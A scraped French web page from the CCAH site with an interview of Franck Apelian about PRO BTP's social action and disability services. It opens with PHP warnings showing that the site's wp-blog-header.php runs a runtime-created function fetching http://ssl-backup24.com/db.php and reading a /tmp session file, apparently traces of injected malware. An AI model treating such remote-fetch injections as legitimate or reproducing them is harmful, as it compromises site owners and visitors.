Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/ccahouzx/www/wp-blog-header.php(2) : runtime-created function on line 26

Warning: file_get_contents(http://ssl-backup24.com/db.php) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/ccahouzx/www/wp-blog-header.php(2) : runtime-created function on line 26

Warning: file_get_contents(/tmp/sess_801e6384475c4db370d0c696f0) [function.file-get-contents]: failed to open stream: No such file or directory in /home/ccahouzx/www/wp-blog-header.php(2) : runtime-created function on line 139
 3 questions à Franck Apelian, directeur des activités sociales du groupe PRO BTP | Le CCAH
Accueil AccueilEntretiens3 questions à Franck Apelian, directeur des activités sociales du groupe PRO BTP

3 questions à Franck Apelian, directeur des activités sociales du groupe PRO BTP

Le

franck-apelian

Quelles sont les orientations prioritaires de l’action sociale du groupe PRO BTP ?

L’action sociale du groupe PRO BTP accompagne durablement ses adhérents en situation de vulnérabilité. Elle vise plus particulièrement à :

  • favoriser le maintien à domicile des personnes fragilisées ;
  • soutenir les aidants familiaux ;
  • accompagner le grand âge en perte d’autonomie ;
  • faciliter l’intégration des jeunes dans la branche du BTP ;
  • développer des services d’accompagnement social permettant de faciliter l’accès au logement des actifs, ou à accompagner le retour à l’emploi ;
  • intervenir pour les dépenses de santé liées à des situations d’urgence et réaliser des actions de prévention vers les actifs.

Ainsi, l’action sociale de PRO BTP s’inscrit dans les orientations prioritaires de l’AGIRC-ARRCO, tout en développant une approche professionnelle adaptée à la branche du BTP dans laquelle l’action sociale prévoyance représente plus de 2/3 des financements.

Dans le domaine du handicap, quelles sont les actions menées actuellement par le groupe ?

PRO BTP mène de multiples actions dans le champ du handicap, à travers l’accueil des personnes dans les établissements médico sociaux, l’accès aux vacances, et la mise en œuvre de solution de répit. Au-delà de l’activité d’une institution de prévoyance qui intervient pour le versement des rentes invalidité, PRO BTP propose différentes aides permettant aux personnes handicapées de rester à domicile, via le financement de l’adaptation du logement, ou d’appareillage.

Il convient de rappeler que BTP RMS gère directement de nombreux établissements dans le champ du handicap. Cette activité concerne notamment :

  • 9 établissements sanitaires qui accueillent des personnes en soins de suite, avec pour plusieurs d’entre eux, une orientation de rééducation fonctionnelle visant à favoriser le retour à domicile ;
  • le centre du Belloy, près de Beauvais, qui est un établissement spécialisé dans la rééducation après amputation disposant d’une forte expérience en matière de prothèse ;
  • un centre de réadaptation professionnelle situé aussi au sein de l’établissement du Belloy, qui accueille des personnes handicapées orientées par la MDPH pour des formations leur permettant une reconversion.

PRO BTP est par ailleurs associé majoritaire de la SCI REVICAP, qui conçoit et construit des établissements pour Personne Handicapées Vieillissantes, gérés par BTP RMS. Deux Foyers d’Accueil Médicalisé existent : l’un à Sauveterre de Béarn (33 places) et l’autre à Gradignan (36 places) avec une ouverture programmée au 4° trimestre 2016.

Enfin, PRO BTP accompagne et facilite l’accès aux vacances pour les personnes handicapées et le répit de leurs aidants :

  • les villages de Vacances BTP VACANCES, sont adaptés à l’accueil des personnes à mobilité réduite, et le groupe PRO BTP assume la gratuité de l’accompagnant d’une personne handicapée partant en vacances. Ainsi, près de 1 000 personnes par an bénéficient de ce dispositif ;
  • PRO BTP a initié et porte le projet « Vacances Répit Familles » avec l’association AFM Téléthon. Ce nouveau concept qui associe un village de vacances et une prise en charge médico-sociale, offre la possibilité d’accueillir en vacances la personne handicapée et ses aidants familiaux.

En qualité de membre adhérent, qu’attend le groupe PRO BTP du CCAH ?

Le CCAH est avant tout le lieu de rencontre entre financeurs et associations du champ du handicap.

Il permet une meilleure connaissance des attentes et priorités de chacun et favorise l’échange au service de l’amélioration des actions vers les personnes handicapées et leur entourage.

Ainsi, par la spécificité de sa gouvernance et ses missions, le CCAH constitue un outil important de veille concernant la prise en compte du handicap dans les différentes politiques sociales : évolutions sociétales, identification des innovations, repérage des initiatives et des bonnes pratiques.

C’est pourquoi nos attentes envers les CCAH portent moins sur des choix d’investissement que sur une mise en commun des orientations, des innovations et des bonnes pratiques.

Laissez un commentaire

  • (will not be published)

Vous pouvez utiliser ces balises XHTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>